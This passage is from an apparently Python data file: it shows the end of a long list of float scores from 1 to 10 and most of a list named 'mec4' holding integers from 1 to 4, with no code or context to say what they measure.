3.0, 6.0, 5.0, 4.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 8.0, 6.0, 8.0, 10.0, 6.0, 1.0, 1.0, 2.0, 7.0, 5.0, 5.0, 10.0, 3.0, 6.0, 5.0, 8.0, 8.0, 6.0, 8.0, 10.0, 2.0, 1.0, 9.0, 1.0, 1.0, 4.0, 3.0, 1.0, 6.0, 7.0, 10.0, 4.0, 4.0, 8.0, 3.0, 8.0, 9.0, 3.0, 1.0, 9.0, 8.0, 5.0, 1.0, 4.0, 1.0, 2.0, 4.0, 5.0, 4.0, 6.0, 10.0, 2.0, 6.0, 8.0, 7.0, 5.0, 5.0, 1.0, 7.0, 4.0, 4.0, 4.0, 6.0, 1.0, 6.0, 8.0, 9.0, 8.0, 6.0, 6.0, 7.0, 5.0, 9.0, 9.0, 4.0, 8.0, 6.0, 4.0, 4.0, 1.0, 9.0, 4.0, 10.0, 6.0, 5.0, 1.0, 10.0, 4.0, 6.0, 1.0, 8.0, 4.0, 1.0, 5.0, 5.0, 2.0, 4.0, 1.0, 7.0, 1.0, 7.0, 9.0, 1.0, 9.0, 3.0, 4.0, 10.0, 1.0, 9.0, 2.0, 9.0, 5.0, 5.0, 3.0, 8.0, 2.0, 9.0, 8.0, 8.0, 8.0, 9.0, 3.0, 1.0, 9.0, 3.0, 9.0, 1.0, 2.0, 5.0, 3.0, 3.0, 8.0, 4.0, 9.0, 1.0, 4.0, 4.0, 9.0, 1.0, 2.0, 2.0, 4.0, 5.0, 8.0, 1.0, 2.0, 5.0, 5.0, 6.0, 9.0, 10.0, 6.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 4.0, 9.0, 1.0, 5.0, 9.0, 1.0, 3.0, 2.0, 5.0, 5.0, 7.0, 1.0, 4.0, 4.0, 5.0, 1.0, 8.0, 1.0, 4.0, 3.0, 1.0, 8.0, 4.0, 8.0, 9.0, 9.0, 9.0, 6.0, 9.0, 6.0, 6.0, 8.0, 2.0, 9.0, 7.0, 1.0, 4.0, 6.0, 3.0, 4.0, 5.0, 8.0, 4.0, 6.0, 6.0, 6.0, 2.0, 4.0, 1.0, 3.0, 8.0, 3.0, 2.0, 10.0, 9.0, 10.0, 10.0, 3.0, 1.0, 7.0, 2.0, 7.0, 2.0, 4.0, 7.0, 6.0, 7.0, 7.0, 1.0, 10.0, 8.0, 8.0, 3.0, 6.0, 7.0, 4.0, 9.0, 4.0, 6.0, 7.0, 10.0, 8.0, 10.0, 9.0, 9.0, 5.0, 4.0, 5.0, 9.0, 1.0, 4.0, 8.0, 8.0, 1.0, 5.0, 8.0, 8.0, 9.0, 5.0, 7.0, 1.0, 10.0, 6.0, 2.0, 1.0, 8.0, 8.0, 3.0, 1.0, 1.0, 5.0, 9.0, 6.0, 8.0, 7.0, 1.0, 2.0, 9.0, 2.0, 8.0, 7.0, 8.0, 2.0, 1.0, 2.0, 4.0, 6.0, 9.0, 4.0, 3.0, 9.0, 5.0, 1.0, 9.0, 1.0, 6.0, 8.0, 1.0, 8.0, 9.0, 8.0, 4.0, 1.0, 5.0, 9.0, 4.0, 2.0, 8.0, 9.0, 6.0, 7.0, 5.0, 9.0, 1.0, 8.0, 8.0, 8.0, 8.0, 5.0, 6.0, 2.0, 1.0, 9.0, 9.0, 4.0, 5.0, 1.0, 1.0, 4.0, 5.0, 2.0, 3.0, 9.0, 2.0, 1.0, 2.0, 5.0, 4.0, 4.0, 5.0, 4.0, 1.0, 9.0, 6.0, 1.0, 6.0, 5.0, 6.0, 1.0, 1.0, 8.0, 4.0, 6.0, 3.0, 3.0, 6.0, 4.0, 6.0, 3.0, 5.0, 1.0, 8.0, 2.0, 3.0, 5.0, 9.0, 1.0, 1.0, 9.0, 1.0, 8.0, 5.0, 4.0, 4.0, 9.0, 1.0, 10.0, 8.0, 3.0, 2.0, 4.0, 5.0, 3.0, 6.0, 5.0, 9.0, 6.0, 3.0, 
9.0, 5.0, 4.0, 6.0, 3.0, 5.0, 1.0, 9.0, 2.0, 6.0, 6.0, 2.0, 1.0, 9.0, 2.0, 1.0, 10.0, 9.0, 1.0, 5.0, 8.0, 5.0, 9.0, 3.0, 9.0, 9.0, 5.0, 6.0, 1.0, 6.0, 6.0, 6.0, 5.0, 3.0, 3.0, 5.0, 5.0, 5.0, 9.0, 1.0, 5.0, 6.0, 8.0, 5.0, 2.0, 3.0, 6.0, 9.0, 6.0, 4.0, 4.0, 1.0, 8.0, 5.0, 8.0, 1.0, 9.0, 9.0, 2.0, 1.0, 1.0, 1.0, 3.0, 7.0, 4.0, 6.0, 4.0, 10.0, 8.0, 10.0, 6.0, 3.0, 6.0, 5.0, 2.0, 7.0, 8.0, 3.0, 5.0, 4.0, 4.0, 8.0, 3.0, 2.0, 5.0, 9.0, 8.0, 4.0, 4.0, 8.0, 9.0, 9.0, 5.0, 5.0, 1.0, 2.0, 4.0, 9.0, 1.0, 6.0, 3.0, 9.0, 8.0, 10.0, 5.0, 4.0, 7.0, 9.0, 1.0, 3.0, 6.0, 1.0, 5.0, 6.0, 9.0, 1.0, 5.0, 9.0, 6.0, 4.0, 1.0, 9.0, 9.0, 9.0, 8.0, 1.0, 6.0, 3.0, 1.0, 9.0, 5.0, 1.0, 1.0, 9.0, 8.0, 3.0, 10.0, 7.0, 9.0, 1.0, 5.0, 5.0, 6.0, 10.0, 9.0, 9.0, 8.0, 2.0, 6.0, 6.0, 3.0, 9.0, 1.0, 2.0, 6.0, 4.0, 10.0, 3.0, 2.0, 9.0, 8.0, 3.0, 5.0, 9.0, 6.0, 1.0, 8.0, 1.0, 3.0, 4.0, 5.0, 5.0, 8.0, 9.0, 1.0, 4.0, 9.0, 8.0, 9.0, 5.0, 3.0, 3.0, 6.0, 3.0, 3.0, 6.0, 2.0, 9.0, 6.0, 6.0, 9.0, 3.0, 1.0, 9.0, 4.0, 1.0, 9.0, 9.0, 3.0, 2.0, 2.0, 1.0, 6.0, 2.0, 6.0, 3.0, 1.0, 3.0, 2.0, 9.0, 9.0, 1.0, 1.0, 9.0, 1.0, 3.0, 1.0, 2.0, 3.0, 4.0, 9.0, 1.0, 6.0, 5.0, 1.0, 2.0, 8.0, 1.0, 5.0, 7.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 9.0, 8.0, 1.0, 7.0, 2.0, 9.0, 3.0, 2.0, 3.0, 4.0, 9.0, 7.0, 3.0, 9.0, 5.0, 8.0, 1.0, 5.0, 2.0, 2.0, 5.0, 2.0, 9.0, 1.0, 3.0, 9.0, 9.0, 8.0, 7.0, 4.0, 6.0, 1.0, 1.0, 5.0, 3.0, 8.0, 6.0, 6.0, 1.0, 6.0, 8.0, 1.0, 9.0, 8.0, 8.0, 10.0, 6.0, 4.0, 10.0, 1.0, 4.0, 9.0, 8.0, 9.0, 9.0, 5.0, 1.0, 4.0, 2.0, 5.0, 3.0, 6.0, 1.0, 3.0, 10.0, 3.0, 1.0, 5.0, 4.0, 9.0, 10.0, 2.0, 4.0, 1.0, 8.0, 4.0, 3.0, 8.0, 5.0, 8.0, 1.0, 3.0, 9.0, 9.0, 1.0, 6.0, 6.0, 4.0, 10.0, 8.0, 5.0, 7.0, 2.0, 7.0, 4.0, 5.0, 3.0, 1.0, 4.0, 3.0, 1.0, 9.0, 4.0, 6.0, 4.0, 5.0, 8.0, 8.0, 4.0, 9.0, 1.0, 6.0, 4.0, 9.0, 1.0, 1.0, 8.0, 8.0, 8.0, 1.0, 8.0, 2.0, 1.0, 10.0, 1.0, 1.0, 8.0, 4.0, 4.0, 10.0, 4.0, 9.0, 4.0, 8.0, 6.0, 3.0, 9.0, 5.0, 8.0, 4.0, 3.0, 6.0, 4.0, 10.0, 5.0, 5.0, 3.0, 4.0, 2.0, 4.0, 3.0, 6.0, 6.0, 2.0, 8.0, 6.0, 5.0, 5.0, 7.0, 5.0, 9.0, 
9.0, 4.0, 1.0, 7.0, 1.0, 4.0, 8.0, 5.0, 8.0, 10.0, 4.0, 8.0, 6.0, 9.0, 3.0, 4.0, 9.0, 1.0, 1.0, 1.0, 10.0, 8.0, 8.0, 3.0, 8.0, 4.0, 4.0, 3.0, 10.0, 6.0, 5.0, 9.0, 1.0, 6.0, 9.0, 2.0, 3.0, 6.0, 6.0, 8.0, 2.0, 5.0, 1.0, 3.0, 1.0, 4.0, 1.0, 4.0, 1.0, 8.0, 6.0, 5.0, 1.0, 9.0, 1.0, 6.0, 3.0, 3.0, 4.0, 10.0, 5.0, 6.0, 3.0, 10.0, 7.0, 2.0, 1.0, 5.0, 6.0, 8.0, 9.0, 9.0, 4.0, 4.0, 4.0, 4.0, 2.0, 4.0, 9.0, 6.0, 4.0, 2.0, 5.0, 6.0, 3.0, 9.0, 3.0, 5.0, 6.0, 10.0, 3.0, 10.0, 4.0, 3.0, 7.0, 2.0, 5.0, 1.0, 1.0, 1.0, 1.0, 5.0, 6.0, 2.0, 2.0, 9.0, 4.0, 2.0, 9.0, 4.0, 9.0, 2.0, 2.0, 3.0, 3.0, 3.0, 8.0, 5.0, 8.0, 9.0, 10.0, 1.0, 6.0, 2.0, 10.0, 8.0, 1.0, 1.0, 4.0, 3.0, 3.0, 1.0, 5.0, 8.0, 5.0, 8.0, 1.0, 9.0, 1.0, 4.0, 8.0, 8.0, 3.0, 10.0, 6.0, 6.0, 8.0, 3.0, 7.0, 5.0, 5.0, 10.0, 1.0, 4.0, 9.0, 4.0, 10.0, 10.0, 2.0, 8.0, 5.0, 6.0, 9.0, 3.0, 4.0, 8.0, 2.0, 9.0, 6.0, 8.0, 8.0, 3.0, 10.0, 8.0, 8.0, 8.0, 10.0, 5.0, 8.0, 8.0, 6.0, 4.0, 9.0, 4.0, 1.0, 4.0, 9.0, 9.0, 5.0, 5.0, 4.0, 9.0, 7.0, 1.0, 8.0, 1.0, 6.0, 4.0, 10.0, 9.0, 2.0, 4.0, 2.0, 2.0, 3.0, 4.0, 6.0, 2.0, 9.0, 8.0, 1.0, 7.0, 4.0, 2.0, 1.0, 9.0, 8.0, 9.0, 3.0, 9.0, 3.0, 10.0, 5.0, 6.0, 1.0, 8.0, 6.0, 1.0, 8.0, 9.0, 6.0, 9.0, 6.0, 6.0, 5.0, 3.0, 1.0, 9.0, 8.0, 9.0, 2.0, 8.0, 9.0, 9.0, 8.0, 6.0, 3.0, 4.0, 6.0, 3.0, 2.0, 4.0, 10.0, 8.0, 1.0, 2.0, 1.0, 4.0, 8.0, 2.0, 10.0, 5.0, 6.0, 5.0, 2.0, 1.0, 5.0, 4.0, 1.0, 10.0, 3.0, 3.0, 5.0, 9.0, 6.0, 10.0, 10.0, 9.0, 9.0, 3.0, 7.0, 5.0, 2.0, 5.0, 6.0, 9.0, 4.0, 4.0, 6.0, 1.0, 6.0, 5.0, 1.0, 8.0, 9.0, 1.0, 9.0, 8.0, 4.0, 3.0, 9.0, 5.0, 5.0, 8.0, 10.0, 3.0, 2.0, 9.0, 7.0, 4.0, 7.0, 2.0, 2.0, 9.0, 8.0, 6.0, 2.0, 5.0, 1.0, 5.0, 9.0, 2.0, 1.0, 2.0, 8.0, 9.0, 3.0, 2.0, 1.0, 1.0, 2.0, 2.0, 1.0, 6.0, 8.0, 2.0, 4.0, 10.0, 4.0, 1.0, 8.0, 3.0, 9.0, 3.0, 5.0, 2.0, 6.0, 1.0, 6.0, 4.0, 8.0, 6.0, 1.0, 3.0, 3.0, 1.0, 5.0, 2.0, 3.0, 6.0, 9.0, 9.0, 9.0, 9.0, 1.0, 2.0, 1.0, 1.0, 8.0, 1.0, 5.0, 1.0, 6.0, 5.0, 5.0, 9.0, 3.0, 9.0, 1.0, 5.0, 8.0, 5.0, 9.0, 5.0, 6.0, 2.0, 8.0, 7.0, 1.0, 2.0, 3.0, 8.0, 1.0, 8.0, 2.0, 
1.0, 8.0, 9.0, 9.0, 6.0, 4.0, 4.0, 1.0, 9.0, 9.0, 4.0, 5.0, 7.0, 9.0, 4.0, 3.0, 6.0, 3.0, 4.0, 7.0, 4.0, 8.0, 2.0, 2.0, 10.0, 4.0, 9.0, 8.0, 1.0, 1.0, 9.0, 1.0, 10.0, 8.0, 4.0, 1.0, 4.0, 1.0, 9.0, 2.0, 2.0, 5.0, 6.0, 10.0, 1.0, 10.0, 4.0, 6.0, 6.0, 5.0, 9.0, 8.0, 8.0, 1.0, 9.0, 8.0, 2.0, 6.0, 10.0, 9.0, 8.0, 9.0, 9.0, 5.0, 2.0, 3.0, 8.0, 8.0, 2.0, 10.0, 7.0, 1.0, 9.0, 6.0, 9.0, 5.0, 10.0, 2.0, 10.0, 1.0, 6.0, 1.0, 4.0, 4.0, 10.0, 5.0, 5.0, 1.0, 9.0, 1.0, 4.0, 10.0, 10.0, 5.0, 9.0, 10.0, 4.0, 1.0, 5.0, 5.0, 5.0, 7.0, 9.0, 4.0, 2.0, 4.0, 4.0, 2.0, 2.0, 1.0, 1.0, 3.0, 5.0, 9.0, 2.0, 10.0, 4.0, 5.0, 10.0, 8.0, 3.0, 1.0, 10.0, 9.0, 1.0, 6.0, 5.0, 1.0, 3.0, 8.0, 5.0, 6.0, 4.0, 4.0, 2.0, 4.0, 3.0, 9.0, 7.0, 8.0, 1.0, 1.0, 9.0, 8.0, 2.0, 4.0, 8.0, 1.0, 8.0, 10.0, 8.0, 1.0, 9.0, 9.0, 3.0, 4.0, 10.0, 5.0, 2.0, 5.0, 8.0, 9.0, 6.0, 10.0, 1.0, 3.0, 5.0, 9.0, 8.0, 6.0, 9.0, 9.0, 2.0, 4.0, 8.0, 8.0, 3.0, 9.0, 6.0, 6.0, 1.0, 2.0, 9.0, 2.0, 10.0, 1.0, 1.0, 1.0, 4.0, 9.0, 9.0, 3.0, 8.0, 3.0, 4.0, 7.0, 9.0, 3.0, 8.0, 9.0, 3.0, 3.0, 7.0, 9.0, 9.0, 4.0, 3.0, 1.0, 6.0, 9.0, 1.0, 6.0, 4.0, 9.0, 4.0, 5.0, 2.0, 3.0, 4.0, 9.0, 9.0, 1.0, 1.0, 4.0, 6.0, 8.0, 10.0, 1.0, 8.0, 1.0, 4.0, 2.0, 1.0, 8.0, 9.0, 8.0, 4.0, 8.0, 8.0, 5.0, 1.0, 6.0, 5.0, 4.0, 9.0, 1.0, 8.0, 4.0, 4.0, 6.0, 8.0, 1.0, 9.0, 5.0, 5.0, 1.0, 9.0, 10.0, 2.0, 7.0, 10.0, 2.0, 5.0, 9.0, 7.0, 4.0, 3.0, 9.0, 5.0, 9.0, 9.0, 7.0, 10.0, 9.0, 9.0, 10.0, 7.0, 4.0, 4.0, 3.0, 8.0, 3.0, 4.0, 9.0, 2.0, 6.0, 9.0, 4.0, 6.0, 1.0, 8.0, 4.0, 1.0, 9.0, 10.0, 3.0, 9.0, 2.0, 5.0, 2.0, 3.0, 4.0, 1.0, 5.0, 6.0, 9.0, 6.0, 9.0, 6.0, 8.0, 9.0, 8.0, 5.0, 2.0, 1.0, 3.0, 1.0, 10.0, 5.0, 2.0, 6.0, 9.0, 9.0, 4.0, 3.0, 5.0, 5.0, 6.0, 3.0, 9.0, 10.0, 6.0, 9.0, 3.0, 3.0, 3.0, 5.0, 5.0, 4.0, 1.0, 8.0, 3.0, 1.0, 6.0, 9.0, 6.0, 10.0, 5.0, 1.0, 9.0, 8.0, 5.0, 6.0, 8.0, 4.0, 6.0, 6.0, 9.0, 6.0, 4.0, 8.0, 5.0, 10.0, 2.0, 4.0, 4.0, 1.0, 6.0, 8.0, 6.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 5.0, 9.0, 4.0, 6.0, 9.0, 7.0, 9.0, 6.0, 5.0, 5.0, 2.0, 2.0, 6.0, 3.0, 9.0, 6.0, 4.0, 8.0, 
9.0, 5.0, 3.0, 8.0, 4.0, 8.0, 7.0, 5.0, 9.0, 6.0, 2.0, 3.0, 6.0, 3.0, 9.0, 10.0, 4.0, 1.0, 5.0, 5.0, 8.0, 9.0, 6.0, 4.0, 4.0, 9.0, 9.0, 2.0, 1.0, 7.0, 9.0, 5.0, 9.0, 6.0, 2.0, 2.0, 4.0, 7.0, 8.0, 3.0, 9.0, 8.0, 2.0, 1.0, 5.0, 1.0, 2.0, 5.0, 6.0, 9.0, 1.0, 1.0, 5.0, 4.0, 3.0, 8.0, 6.0, 9.0, 10.0, 4.0, 7.0, 9.0, 3.0, 1.0, 1.0, 3.0, 6.0, 10.0, 9.0, 5.0, 9.0, 3.0, 4.0, 5.0, 4.0, 8.0, 1.0, 9.0, 8.0, 1.0, 5.0, 7.0, 8.0, 6.0, 2.0, 4.0, 8.0, 8.0, 5.0, 3.0, 3.0, 2.0, 1.0, 3.0, 3.0, 9.0, 5.0, 6.0, 9.0, 8.0, 2.0, 9.0, 5.0, 1.0, 1.0, 6.0, 1.0, 5.0, 1.0, 4.0, 9.0, 3.0, 1.0, 8.0, 6.0, 3.0, 6.0, 4.0, 1.0, 4.0, 3.0, 9.0, 10.0, 1.0, 10.0, 5.0, 8.0, 9.0, 2.0, 3.0, 8.0, 8.0, 9.0, 3.0, 9.0, 5.0, 4.0, 6.0, 1.0, 10.0, 5.0, 8.0, 8.0, 1.0, 7.0, 4.0, 4.0, 10.0, 1.0, 2.0, 4.0, 3.0, 4.0, 4.0, 8.0, 8.0, 3.0, 3.0, 6.0, 2.0, 9.0, 4.0, 6.0, 6.0, 7.0, 8.0, 5.0, 8.0, 5.0, 2.0, 4.0, 9.0, 6.0, 6.0, 3.0, 4.0, 3.0, 1.0, 1.0, 9.0, 5.0, 3.0, 5.0, 5.0, 10.0, 2.0, 4.0, 8.0, 8.0, 1.0, 8.0, 10.0, 1.0, 9.0, 8.0, 6.0, 8.0, 9.0, 4.0, 4.0, 3.0, 2.0, 4.0, 4.0, 4.0, 10.0, 1.0, 8.0, 9.0, 6.0, 4.0, 1.0, 2.0, 1.0, 1.0, 6.0, 9.0, 4.0, 1.0, 3.0, 9.0, 6.0, 1.0, 6.0, 3.0, 2.0, 6.0, 8.0, 1.0, 4.0, 5.0, 2.0]
mec4 = [4, 3, 1, 2, 2, 4, 3, 1, 4, 4, 4, 2, 3, 4, 1, 4, 2, 1, 1, 1, 2, 4, 4, 1, 4, 4, 1, 2, 1, 1, 2, 2, 3, 2, 1, 2, 2, 3, 2, 2, 4, 2, 2, 3, 1, 1, 1, 1, 1, 1, 1, 1, 4, 4, 3, 4, 4, 2, 2, 1, 3, 3, 1, 1, 1, 4, 4, 3, 3, 2, 2, 2, 2, 2, 4, 1, 2, 4, 1, 2, 2, 1, 3, 1, 4, 4, 4, 4, 4, 3, 4, 3, 3, 1, 3, 1, 3, 1, 3, 3, 2, 1, 3, 4, 2, 3, 2, 2, 4, 1, 3, 1, 1, 2, 1, 2, 2, 3, 3, 3, 4, 4, 2, 2, 1, 4, 3, 2, 2, 2, 1, 2, 4, 4, 3, 4, 1, 2, 3, 3, 2, 3, 4, 1, 2, 1, 2, 2, 3, 1, 2, 1, 2, 1, 2, 4, 1, 2, 3, 1, 3, 3, 3, 3, 1, 3, 3, 2, 4, 1, 2, 4, 3, 2, 2, 4, 3, 3, 2, 1, 2, 1, 2, 1, 2, 3, 4, 1, 4, 1, 3, 2, 1, 3, 4, 1, 1, 2, 2, 1, 2, 2, 4, 4, 2, 2, 2, 3, 4, 4, 3, 3, 1, 4, 2, 1, 2, 4, 4, 3, 2, 4, 2, 4, 1, 2, 3, 3, 1, 4, 3, 1, 4, 2, 2, 1, 3, 1, 2, 2, 3, 4, 4, 3, 1, 3, 2, 3, 2, 2, 1, 1, 2, 1, 4, 2, 2, 4, 1, 2, 2, 2, 1, 2, 2, 3, 3, 1, 1, 2, 1, 4, 1, 4, 4, 4, 3, 3, 4, 2, 1, 1, 1, 1, 4, 1, 1, 4, 2, 3, 4, 1, 3, 2, 4, 1, 3, 4, 1, 4, 4, 4, 1, 1, 2, 3, 2, 1, 2, 4, 1, 3, 3, 2, 2, 3, 1, 1, 2, 4, 3, 2, 3, 1, 3, 1, 4, 2, 2, 2, 1, 1, 2, 3, 1, 2, 1, 1, 4, 1, 1, 1, 3, 3, 1, 4, 1, 3, 1, 2, 3, 2, 1, 3, 4, 1, 3, 3, 1, 2, 1, 2, 4, 4, 3, 3, 2, 2, 2, 3, 4, 4, 3, 1, 3, 1, 2, 3, 4, 4, 1, 1, 3, 1, 3, 3, 1, 3, 4, 1, 4, 1, 3, 2, 4, 1, 4, 4, 3, 2, 3, 3, 1, 4, 4, 3, 3, 1, 2, 3, 1, 4, 1, 3, 2, 3, 4, 4, 3, 3, 2, 1, 1, 1, 1, 1, 1, 3, 1, 4, 2, 1, 3, 4, 3, 1, 2, 3, 2, 3, 2, 4, 4, 3, 2, 2, 1, 1, 2, 4, 3, 1, 2, 3, 3, 3, 2, 3, 3, 4, 2, 1, 1, 1, 1, 1, 2, 3, 2, 1, 1, 1, 3, 4, 2, 4, 4, 1, 3, 3, 1, 3, 3, 4, 1, 4, 3, 1, 4, 1, 2, 2, 4, 1, 1, 2, 4, 3, 4, 3, 1, 4, 1, 4, 4, 3, 3, 2, 2, 4, 1, 2, 4, 4, 1, 1, 1, 3, 1, 1, 4, 1, 1, 4, 3, 3, 4, 1, 3, 1, 3, 3, 3, 3, 3, 3, 4, 3, 3, 2, 1, 2, 2, 1, 2, 2, 3, 4, 1, 3, 4, 1, 3, 2, 2, 3, 2, 4, 1, 4, 4, 3, 4, 4, 4, 2, 1, 2, 3, 3, 1, 2, 3, 4, 4, 1, 3, 2, 4, 3, 4, 4, 2, 1, 4, 2, 4, 3, 4, 3, 3, 1, 2, 1, 2, 3, 4, 2, 4, 3, 3, 4, 2, 2, 1, 4, 1, 3, 4, 3, 4, 3, 1, 2, 3, 2, 3, 4, 1, 2, 3, 4, 2, 3, 3, 4, 4, 2, 2, 2, 3, 4, 3, 2, 2, 4, 3, 3, 1, 2, 1, 3, 2, 4, 4, 3, 2, 3, 2, 2, 4, 3, 2, 1, 2, 4, 4, 3, 4, 4, 3, 4, 4, 4, 
3, 2, 4, 1, 3, 3, 3, 2, 3, 4, 4, 2, 3, 2, 3, 2, 1, 1, 2, 3, 2, 3, 1, 3, 3, 3, 4, 2, 3, 2, 3, 1, 3, 3, 2, 2, 2, 1, 1, 1, 1, 2, 1, 1, 2, 1, 3, 2, 4, 4, 2, 4, 1, 2, 3, 3, 3, 2, 3, 3, 1, 1, 2, 3, 1, 2, 3, 3, 4, 2, 3, 2, 2, 4, 4, 1, 4, 1, 3, 2, 3, 1, 3, 3, 4, 4, 2, 2, 3, 4, 1, 3, 2, 1, 1, 3, 4, 4, 2, 3, 4, 1, 4, 4, 1, 3, 1, 1, 2, 3, 1, 2, 4, 1, 4, 1, 1, 1, 4, 1, 2, 1, 1, 3, 4, 4, 2, 1, 4, 2, 1, 4, 1, 4, 2, 4, 3, 4, 1, 1, 4, 3, 4, 2, 3, 4, 4, 4, 3, 4, 2, 1, 1, 3, 2, 4, 4, 2, 3, 3, 3, 4, 3, 2, 1, 1, 2, 3, 3, 2, 2, 2, 1, 3, 2, 4, 4, 4, 1, 4, 2, 4, 1, 1, 3, 3, 2, 4, 4, 1, 1, 4, 4, 1, 3, 3, 1, 2, 4, 3, 1, 3, 4, 2, 1, 3, 1, 1, 4, 2, 3, 4, 3, 3, 2, 1, 3, 1, 1, 4, 3, 4, 2, 3, 1, 1, 3, 2, 3, 3, 1, 2, 3, 1, 3, 4, 2, 2, 1, 1, 4, 4, 3, 1, 1, 2, 3, 4, 4, 4, 4, 3, 1, 1, 3, 1, 1, 2, 3, 4, 4, 3, 1, 1, 4, 4, 1, 3, 3, 2, 1, 4, 4, 3, 3, 3, 2, 4, 2, 2, 2, 4, 4, 2, 3, 3, 3, 1, 4, 2, 3, 2, 1, 4, 3, 3, 1, 1, 2, 1, 4, 1, 3, 3, 4, 4, 4, 3, 4, 2, 2, 3, 4, 1, 2, 4, 3, 3, 3, 1, 2, 1, 4, 4, 4, 2, 2, 1, 2, 4, 4, 4, 4, 4, 1, 1, 3, 4, 2, 1, 3, 4, 2, 2, 1, 3, 2, 4, 1, 4, 2, 1, 1, 2, 4, 1, 2, 2, 2, 3, 1, 1, 4, 1, 3, 4, 1, 4, 2, 4, 1, 3, 2, 4, 2, 4, 1, 1, 2, 1, 4, 3, 1, 4, 4, 2, 3, 1, 4, 2, 4, 1, 1, 3, 1, 1, 2, 1, 3, 1, 4, 3, 4, 4, 3, 2, 2, 1, 3, 2, 2, 2, 1, 3, 1, 2, 3, 2, 1, 1, 2, 1, 2, 2, 3, 2, 1, 3, 3, 2, 2, 3, 2, 2, 4, 3, 3, 4, 2, 2, 2, 3, 3, 4, 4, 3, 2, 1, 3, 1, 4, 4, 1, 1, 1, 1, 1, 3, 1, 1, 1, 4, 1, 2, 1, 3, 2, 4, 4, 2, 4, 4, 3, 2, 2, 3, 1, 4, 3, 4, 3, 3, 2, 4, 4, 4, 3, 2, 4, 4, 4, 3, 2, 4, 4, 4, 4, 3, 1, 2, 4, 2, 4, 2, 4, 3, 4, 1, 3, 2, 3, 3, 3, 2, 1, 3, 3, 2, 3, 4, 2, 1, 2, 1, 4, 4, 2, 1, 2, 4, 4, 1, 3, 4, 4, 3, 2, 4, 3, 3, 4, 3, 2, 2, 3, 4, 3, 3, 1, 1, 4, 4, 3, 2, 2, 3, 2, 1, 1, 4, 1, 2, 3, 4, 1, 4, 1, 1, 3, 3, 4, 2, 4, 2, 2, 1, 3, 2, 3, 4, 4, 3, 2, 4, 1, 3, 1, 3, 2, 1, 3, 3, 2, 4, 2, 3, 1, 4, 4, 2, 2, 1, 4, 4, 3, 4, 1, 4, 2, 2, 2, 3, 1, 4, 3, 1, 3, 2, 4, 4, 2, 4, 4, 1, 4, 1, 3, 1, 3, 2, 3, 1, 3, 2, 2, 1, 1, 3, 3, 2, 2, 2, 1, 2, 1, 1, 2, 4, 1, 1, 3, 1, 3, 3, 4, 1, 4, 3, 1, 1, 3, 2, 2, 2, 2, 3, 
1, 1, 2, 1, 4, 4, 4, 2, 4, 3, 3, 3, 4, 3, 3, 3, 4, 4, 2, 4, 3, 3, 2, 4, 4, 3, 2, 4, 3, 4, 2, 4, 2, 4, 4, 4, 2, 4, 3, 3, 1, 4, 4, 2, 1, 4, 1, 1, 1, 1, 4, 2, 3, 3, 4, 1, 4, 4, 4, 4, 2, 2, 1, 4, 2, 1, 2, 3, 4, 1, 3, 3, 2, 2, 2, 1, 4, 3, 3, 1, 1, 1, 3, 3, 2, 3, 3, 3, 4, 1, 4, 3, 1, 1, 3, 4, 1, 3, 1, 2, 4, 3, 1, 1, 2, 1, 1, 2, 4, 1, 1, 3, 2, 1, 3, 4, 3, 3, 4, 1, 2, 1, 4, 2, 3, 1, 3, 3, 4, 2, 3, 1, 1, 3, 1, 3, 4, 2, 1, 1, 2, 4, 3, 2, 1, 3, 4, 1, 2, 1, 1, 4, 3, 1, 4, 3, 3, 4, 2, 4, 2, 3, 4, 2, 3, 3, 1, 1, 2, 1, 3, 4, 3, 4, 3, 2, 2, 1, 1, 3, 1, 4, 4, 3, 2, 4, 3, 1, 4, 3, 2, 4, 2, 2, 3, 4, 4, 2, 4, 2, 2, 2, 1, 1, 1, 1, 2, 3, 4, 2, 4, 3, 4, 2, 4, 3, 1, 4, 4, 2, 2, 1, 2, 4, 3, 3, 1, 3, 3, 2, 3, 2, 3, 3, 4, 1, 3, 2, 3, 2, 2, 2, 4, 1, 3, 2, 3, 1, 3, 2, 2, 3, 1, 4, 3, 4, 2, 1, 1, 2, 1, 3, 1, 3, 2, 2, 4, 1, 4, 3, 2, 2, 4, 4, 4, 1, 3, 1, 3, 3, 4, 1, 2, 2, 1, 3, 3, 2, 4, 1, 2, 1, 3, 1, 3, 3, 2, 3, 3, 3, 1, 4, 2, 1, 2, 2, 2, 1, 3, 2, 1, 3, 1, 4, 4, 4, 3, 1, 4, 1, 1, 2, 1, 4, 2, 4, 3, 1, 2, 2, 4, 1, 3, 2, 2, 2, 1, 1, 4, 1, 1, 1, 2, 3, 2, 3, 1, 2, 1, 4, 4, 4, 3, 3, 2, 1, 1, 3, 4, 4, 4, 3, 2, 4, 3, 3, 4, 1, 4, 2, 2, 2, 3, 4, 2, 3, 2, 3, 1, 1, 3, 2, 3, 4, 2, 3, 1, 4, 3, 4, 2, 2, 4, 4, 1, 1, 2, 3, 3, 2, 3, 1, 1, 1, 4, 1, 2, 1, 3, 3, 1, 1, 3, 3, 3, 4, 4, 3, 1, 1, 4, 4, 3, 3, 4, 1, 1, 1, 2, 2, 1, 2, 3, 1, 2, 3, 3, 2, 3, 4, 2, 4, 3, 3, 3, 3, 2, 4, 1, 1, 1, 3, 4, 1, 4, 1, 3, 1, 1, 3, 1, 1, 2, 1, 3, 1, 4, 2, 4, 4, 1, 3, 4, 1, 2, 3, 3, 2, 4, 2, 4, 2, 4, 4, 2, 2, 2, 3, 2, 3, 2, 1, 3, 4, 3, 4, 2, 1, 1, 2, 3, 2, 1, 1, 4, 4, 4, 3, 3, 4, 3, 4, 4, 2, 3, 1, 3, 4, 4, 3, 2, 2, 1, 4, 3, 1, 3, 1, 3, 3, 3, 4, 1, 4, 2, 2, 2, 1, 3, 2, 2, 3, 3, 4, 1, 1, 3, 2, 2, 3, 1, 3, 1, 4, 4, 2, 4, 1, 4, 2, 2, 2, 1, 3, 2, 3, 4, 1, 1, 1, 1, 1, 3, 1, 1, 4, 4, 2, 2, 1, 3, 3, 2, 1, 1, 2, 3, 1, 2, 4, 3, 4, 4, 2, 2, 2, 2, 2, 2, 3, 4, 3, 2, 2, 3, 3, 3, 3, 2, 4, 2, 2, 1, 4, 4, 1, 2, 4, 2, 1, 4, 3, 1, 3, 4, 1, 4, 4, 1, 4, 1, 3, 4, 3, 4, 2, 1, 2, 2, 3, 3, 3, 